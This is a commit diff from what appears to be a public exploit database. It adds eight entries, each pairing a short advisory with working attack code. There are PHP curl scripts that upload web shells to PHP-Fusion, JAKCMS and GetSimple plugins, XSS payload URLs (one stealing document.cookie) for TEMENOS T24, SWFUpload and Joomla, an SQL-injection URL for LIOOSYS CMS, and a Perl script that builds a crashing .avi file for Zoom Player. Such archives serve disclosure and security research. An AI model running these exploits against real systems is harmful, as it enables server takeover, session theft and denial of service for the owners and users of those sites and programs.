DB: 2015-07-04

8 new exploits
2015-07-04 05:01:45 +00:00 · 2015-07-04 05:01:45 +00:00 · 369395e0c1
commit 369395e0c1
parent b22d6ae97a
9 changed files with 170 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -33812,3 +33812,11 @@ id,file,description,date,author,platform,type,port
 37462,platforms/windows/dos/37462.pl,"VLC Media Player 2.0.1 '.avi' File Denial of Service Vulnerability",2012-06-28,Dark-Puzzle,windows,dos,0
 37463,platforms/windows/dos/37463.pl,"Real Networks RealPlayer '.avi' File Divide-By-Zero Denial of Service Vulnerability",2012-06-28,Dark-Puzzle,windows,dos,0
 37464,platforms/php/webapps/37464.txt,"WordPress Albo Pretorio Online 3.2 - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",php,webapps,80
+37466,platforms/php/webapps/37466.php,"PHP-Fusion Advanced MP3 Player Infusion 'upload.php' Arbitrary File Upload Vulnerability",2012-06-28,"Sammy FORGIT",php,webapps,0
+37467,platforms/jsp/webapps/37467.txt,"TEMENOS T24 Multiple Cross Site Scripting Vulnerabilities",2012-06-28,"Rehan Ahmed",jsp,webapps,0
+37468,platforms/php/webapps/37468.php,"JAKCMS PRO 2.2.6 'uploader.php' Arbitrary File Upload Vulnerability",2012-06-29,"Sammy FORGIT",php,webapps,0
+37469,platforms/php/webapps/37469.txt,"LIOOSYS CMS SQL Injection and Information Disclosure Vulnerabilities",2012-06-29,MustLive,php,webapps,0
+37470,platforms/multiple/webapps/37470.txt,"SWFUpload 'movieName' Parameter Cross Site Scripting Vulnerability",2012-06-29,"Nathan Partlan",multiple,webapps,0
+37471,platforms/windows/dos/37471.pl,"Zoom Player '.avi' File Divide-By-Zero Denial of Service Vulnerability",2012-07-02,Dark-Puzzle,windows,dos,0
+37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin 'php.php' Arbitrary File Upload Vulnerability",2012-07-02,"Sammy FORGIT",php,webapps,0
+37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0
--- a/platforms/jsp/webapps/37467.txt
+++ b/platforms/jsp/webapps/37467.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/54235/info
+
+TEMENOS T24 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+GET /jsps/genrequest.jsp?&routineName=OS.NEW.USER& routineArgs=BANNER"/><STYLE>@import"javascript:alert ('XSS%20Dangerous')";</STYLE> HTTP/1.1
--- a/platforms/multiple/webapps/37470.txt
+++ b/platforms/multiple/webapps/37470.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54245/info
+
+SWFUpload is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+SWFUpload 2.2.0.1 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/v220/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;// 
--- a/platforms/php/webapps/37466.php
+++ b/platforms/php/webapps/37466.php
@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/54228/info
+
+PHP-Fusion Advanced MP3 Player Infusion is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Advanced MP3 Player Infusion 2.01 is vulnerable; other versions may also be affected. 
+
+PostShell.php
+<?php
+
+$uploadfile="lo.php.mp3";
+
+$ch = curl_init("http://http://www.example.com/php-fusion/infusions/mp3player_panel/upload.php?folder=/php-fusion/infusions/mp3player_panel/");
+curl_setopt($ch, CURLOPT_POST, true);   
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+   
+print "$postResult";
+
+?>
+
+Shell Access : http://http://www.example.com/php-fusion/infusions/mp3player_panel/lo.php.mp3
+
+lo.php.mp3
+<?php
+phpinfo();
+?>
--- a/platforms/php/webapps/37468.php
+++ b/platforms/php/webapps/37468.php
@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/54238/info
+
+JAKCMS PRO is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+JAKCMS PRO 2.2.6 is vulnerable; other versions may also be affected. 
+
+<?php
+
+$uploadfile="lo.php";
+
+$ch = curl_init("http://www.example.com/admin/uploader/uploader.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile",
+                                            
+  'catID'=>'../admin/css/calendar/'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
--- a/platforms/php/webapps/37469.txt
+++ b/platforms/php/webapps/37469.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/54239/info
+
+LIOOSYS CMS is prone to an SQL-injection vulnerability and an information-disclosure vulnerability.
+
+Exploiting these issues could allow an attacker to obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+The following example URIs are available:
+
+http://www.example.com/index.php?id
+
+http://www.example.com/_files_/db.log 
--- a/platforms/php/webapps/37472.php
+++ b/platforms/php/webapps/37472.php
@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/54255/info
+
+Items Manager Plugin for GetSimple CMS is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Items Manager Plugin 1.5 is vulnerable; other versions may also be affected. 
+
+<?php
+
+$uploadfile="lo.php";
+
+$ch = curl_init("http://www.example.com/getsimple/plugins/items/uploader/server/php.php");
+curl_setopt($ch, CURLOPT_POST, true);   
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+   
+print "$postResult";
+
+?>
--- a/platforms/php/webapps/37473.txt
+++ b/platforms/php/webapps/37473.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/54259/info
+
+Joomla! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Joomla! 2.5.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/joomla/index.php/image-gallery/"><script>alert(document.cookie)</script>/25-koala
+http://www.example.com/joomla/index.php/image-gallery/"><script>alert('xss')</script>/25-koala
+
+http://www.example.com/joomla/index.php/image-gallery/animals/25-"><script>alert(document.cookie)</script>
+http://www.example.com/joomla/index.php/image-gallery/animals/25-"><script>alert('xss')</script>
--- a/platforms/windows/dos/37471.pl
+++ b/platforms/windows/dos/37471.pl
@ -0,0 +1,46 @@
+source: http://www.securityfocus.com/bid/54249/info
+
+Zoom Player is prone to a remote denial-of-service vulnerability.
+
+Successful exploits may allow attackers to crash the affected application, resulting in denial-of-service conditions.
+
+Zoom Player 4.51 is vulnerable; other versions may also be affected. 
+
+#------------------------------------------------------------------------#
+#                                                                        #
+#                     Usage : perl zoom.pl                               #
+#                                                                        #
+#------------------------------------------------------------------------#
+
+my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00 
+\x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb
+\x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50 
+\x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e 
+\x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2 
+\x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2 
+\xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29 
+\xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53 
+\x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad 
+\x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61
+\x9e\x75\x4c\x71\xa2\x9d\xfd\x65\xcc\x59\x23\xe0\xeb\xae\x58\xa3 
+\xe9\xff\x16\xfc\x08\x03\x36\x4a\x69\xbb\xc4\x19\x10\x1b\xc8\x2c 
+\x9e\xd9\x56\xfe\x38\x32\xf7\xe5\x2c\xd8\xb4\x6c\x31\xcc\x15\x5c 
+\x41\xda\x03\xde\x5c\x23\x2d\xda\x4f\x7b\x44\x07\x60\x24\xa7\x58 
+\x65\xf7\xe9\xaa\xff\x02\x9d\x1f\x39\x76\x7e\x75\x43\xac\xe5\xc9 
+\xd0\x43\x2e\x4c\xeb\x81\x26\xb5\xcf\x6d\xb9\xe9\xa0\xc7\x85\x4a 
+\xce\x5f\xb4\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
+\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff
+\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
+\xcb\x6e\x2a\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
+
+# A division by zero exploit causing a DoS to the program ( neither you can't play nothing nor close the program ) . 
+#  to close the Zoom player you have to use the Windows Task Manager .
+
+
+my $file = "darkexploit.avi";
+
+open ($File, ">$file");
+print $File $h;
+close ($File);
+
+#-------------------------------------------------------------------------------